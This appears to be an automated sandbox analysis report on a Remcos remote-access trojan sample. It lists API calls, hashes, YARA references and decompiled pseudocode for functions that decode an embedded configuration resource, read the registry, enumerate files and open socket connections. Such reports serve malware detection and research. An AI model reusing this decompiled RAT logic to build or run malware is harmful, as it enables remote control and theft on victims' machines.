                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                  • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                  • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                  • API String ID: 1672879135-1557472714
                                  • Opcode ID: 29ac0dad2c791b8b19860c1f76644832782db97cd54db988fe52e447018da257
                                  • Instruction ID: 756b6b72303f02f0a44bbd524559c36dcc88ee27c0131fa1ad94d22a553bdc8a
                                  • Opcode Fuzzy Hash: 29ac0dad2c791b8b19860c1f76644832782db97cd54db988fe52e447018da257
                                  • Instruction Fuzzy Hash: 5862C572A00648EBDB057BB0AC599FE3B29EB84305F04447EF502A72D2DF784D458B6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004129EB, Relevance: 21.1, APIs: 14, Instructions: 85COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6B015DF0), ref: 00412A90
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A9A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AA3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                  • String ID:
                                  • API String ID: 3435050692-0
                                  • Opcode ID: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                  • Instruction ID: d00c3f8f62f9657134ffe5fc931faad8ab4b4020c85508924df81fb6bcd52547
                                  • Opcode Fuzzy Hash: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                  • Instruction Fuzzy Hash: F631BB7250050EEBCB04EFA0E959CDE7778EF94745B108066F812E7160EB74AB49CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413FA4, Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t24;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0x416e50);
				_push(0x414130);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x41c26c =  *0x41c26c | 0xffffffff;
				 *0x41c270 =  *0x41c270 | 0xffffffff;
				 *(__p__fmode()) =  *0x41c264;
				_t24 = __p__commode();
				_t47 =  *0x41c260;
				 *_t24 =  *0x41c260;
				 *0x41c268 = _adjust_fdiv;
				_t27 = E00404F3A( *_adjust_fdiv);
				_t60 =  *0x41b190; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E0041412C);
					_pop(_t47);
				}
				E0041411A(_t27);
				_push(0x41b0e8);
				_push(0x41b0e4);
				L00414114();
				_v112 =  *0x41c25c;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112);
				_push(0x41b0e0);
				_push(0x41b000); // executed
				L00414114(); // executed
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while(1) {
						__eflags =  *_t54 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t42 =  *_t54;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				L7:
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t68 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E00408C98(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38); // executed
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0041410E();
				return _t41;
			}

























                                  0x00413fa7
                                  0x00413fa9
                                  0x00413fae
                                  0x00413fb9
                                  0x00413fba
                                  0x00413fc7
                                  0x00413fcc
                                  0x00413fd1
                                  0x00413fd8
                                  0x00413fdf
                                  0x00413ff2
                                  0x00413ff4
                                  0x00413ffa
                                  0x00414000
                                  0x00414009
                                  0x0041400e
                                  0x00414013
                                  0x00414019
                                  0x00414020
                                  0x00414026
                                  0x00414026
                                  0x00414027
                                  0x0041402c
                                  0x00414031
                                  0x00414036
                                  0x00414040
                                  0x00414059
                                  0x0041405f
                                  0x00414064
                                  0x00414069
                                  0x00414076
                                  0x00414078
                                  0x0041407e
                                  0x004140ba
                                  0x004140ba
                                  0x004140bd
                                  0x00000000
                                  0x00000000
                                  0x004140bf
                                  0x004140c0
                                  0x004140c0
                                  0x00414080
                                  0x00414080
                                  0x00414080
                                  0x00414081
                                  0x00414084
                                  0x00414086
                                  0x00414091
                                  0x00414093
                                  0x00414093
                                  0x00414094
                                  0x00414094
                                  0x00414091
                                  0x00414097
                                  0x00414097
                                  0x0041409b
                                  0x00000000
                                  0x00000000
                                  0x004140a1
                                  0x004140a8
                                  0x004140ae
                                  0x004140b2
                                  0x004140c7
                                  0x004140b4
                                  0x004140b4
                                  0x004140b4
                                  0x004140d3
                                  0x004140d8
                                  0x004140dc
                                  0x004140e2
                                  0x004140e7
                                  0x004140e9
                                  0x004140ec
                                  0x004140ed
                                  0x004140ee
                                  0x004140f5

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                  • Instruction ID: 203440f8f63e4a3495bc52082528d8eb2041b3e21c5ddc4624b2c062dd02aed8
                                  • Opcode Fuzzy Hash: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                  • Instruction Fuzzy Hash: 92416DB1D40708EFDB209FA5DC89AEA7FB8EB49710F20412FE95197291D7784880CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409823, Relevance: 12.1, APIs: 8, Instructions: 81COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00409823(intOrPtr _a4) {
				unsigned int _v8;
				signed char* _v12;
				char _v13;
				void* _v20;
				void* _v24;
				char _v40;
				void* _v56;
				char _v1080;
				void* _t36;
				signed int _t38;
				signed int _t42;
				int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t66;
				signed char* _t76;
				void* _t83;
				void* _t88;
				void* _t89;

				_v12 = _v12 & 0x00000000;
				_v8 = E00409D02( &_v12);
				_t51 =  *_v12 & 0x000000ff;
				_t36 = malloc(_t51);
				_t76 = _v12;
				_t54 = _t51;
				_t7 = _t76 + 1; // 0x1
				_t88 = _t7;
				_v24 = _t36;
				_t55 = _t54 >> 2;
				memcpy(_t36, _t88, _t55 << 2);
				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13); // executed
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
				_t83 = malloc(_v8);
				_t42 = _v12;
				_v20 = _t83;
				_t20 = _t42 + 1; // 0x1
				_t89 = _t51 + _t20;
				_t66 = _v8 >> 2;
				memcpy(_t89 + _t66 + _t66, _t89, memcpy(_t83, _t89, _t66 << 2) & 0x00000003);
				E00402F9B( &_v1080, _v24, _t51);
				E0040309E( &_v1080,  &_v40, _v20, _v8);
				free(_v20);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _a4;
			}






















                                  0x0040982c
                                  0x0040983c
                                  0x00409842
                                  0x00409846
                                  0x0040984c
                                  0x00409853
                                  0x00409855
                                  0x00409855
                                  0x0040985a
                                  0x0040985d
                                  0x00409860
                                  0x00409867
                                  0x00409872
                                  0x0040987e
                                  0x00409887
                                  0x00409892
                                  0x0040989e
                                  0x004098a0
                                  0x004098a4
                                  0x004098aa
                                  0x004098aa
                                  0x004098b1
                                  0x004098be
                                  0x004098c6
                                  0x004098db
                                  0x004098e3
                                  0x004098f1
                                  0x004098fa
                                  0x00409907

                                  APIs
                                    • Part of subcall function 00409D02: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                    • Part of subcall function 00409D02: LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                    • Part of subcall function 00409D02: LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                    • Part of subcall function 00409D02: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                  • malloc.MSVCRT ref: 00409846
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                  • malloc.MSVCRT ref: 00409898
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                  • String ID:
                                  • API String ID: 531887698-0
                                  • Opcode ID: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                  • Instruction ID: 644eff2a9cee41870484989b0ac8d3f9873871745537e3c52d27647a0f1bd5cd
                                  • Opcode Fuzzy Hash: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                  • Instruction Fuzzy Hash: 5B314971A0010DEFCF04DFA4E9999EEBBB9FF88315B10416AE916A3290DB746F04CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B4C8, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B4C8(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
				int _v8;
				int _v12;
				int _t14;
				long _t16;
				long _t20;
				signed int _t21;

				_t14 = 4;
				_v8 = _t14;
				_v12 = _t14;
				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
				if(_t16 != 0) {
					return 0;
				} else {
					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8); // executed
					_t21 = RegCloseKey(_a8); // executed
					return _t21 & 0xffffff00 | _t20 == 0x00000000;
				}
			}









                                  0x0040b4cf
                                  0x0040b4d0
                                  0x0040b4d3
                                  0x0040b4e7
                                  0x0040b4ef
                                  0x0040b521
                                  0x0040b4f1
                                  0x0040b505
                                  0x0040b510
                                  0x0040b51d
                                  0x0040b51d

                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                  • RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                  • RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                  • Instruction ID: e9b8f34285146556d923ff1311e539e3090c3a2a7499f994c32c4d3a3a900868
                                  • Opcode Fuzzy Hash: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                  • Instruction Fuzzy Hash: A8F0F976900218FFDF118FA0EC06FDA7FA8EB48764F148165FA05EA150E7719A10AB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413E46, Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: __dllonexit_onexit
                                  • String ID:
                                  • API String ID: 2384194067-0
                                  • Opcode ID: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                  • Instruction ID: 4ade6cbf426c929272142e716342c2a11d1dea90e179e11a85702f2ae3751f82
                                  • Opcode Fuzzy Hash: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                  • Instruction Fuzzy Hash: 55C01274CC4301FBCF102B60BC866C67711B7A1B32BA087AAF565110F0C77D49A4AA0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 0040477E, Relevance: 88.8, APIs: 59, Instructions: 322filenetworkthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00404783
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000004,0041B310), ref: 004047A0
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 004047B3
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 004047C2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,00000000,00000001,00000006), ref: 004047EB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000000,00000001,00000006), ref: 004047F5
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040481B
                                  • _CxxThrowException.MSVCRT(00000001,00416FB8), ref: 0040483B
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404849
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404853
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040485D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404883
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040488D
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404894
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004048A3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004048C2
                                  • _CxxThrowException.MSVCRT(00000002,00416FB8), ref: 004048E8
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 004048F7
                                  • wcscmp.MSVCRT ref: 00404924
                                  • wcscmp.MSVCRT ref: 0040493C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A24), ref: 00404961
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00404973
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00404983
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404991
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040499D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049AC
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049BE
                                    • Part of subcall function 00404C0A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                    • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                    • Part of subcall function 00404C0A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                    • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                    • Part of subcall function 00404C0A: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                    • Part of subcall function 00404C0A: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                    • Part of subcall function 00404C0A: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                    • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CCA
                                    • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CE2
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
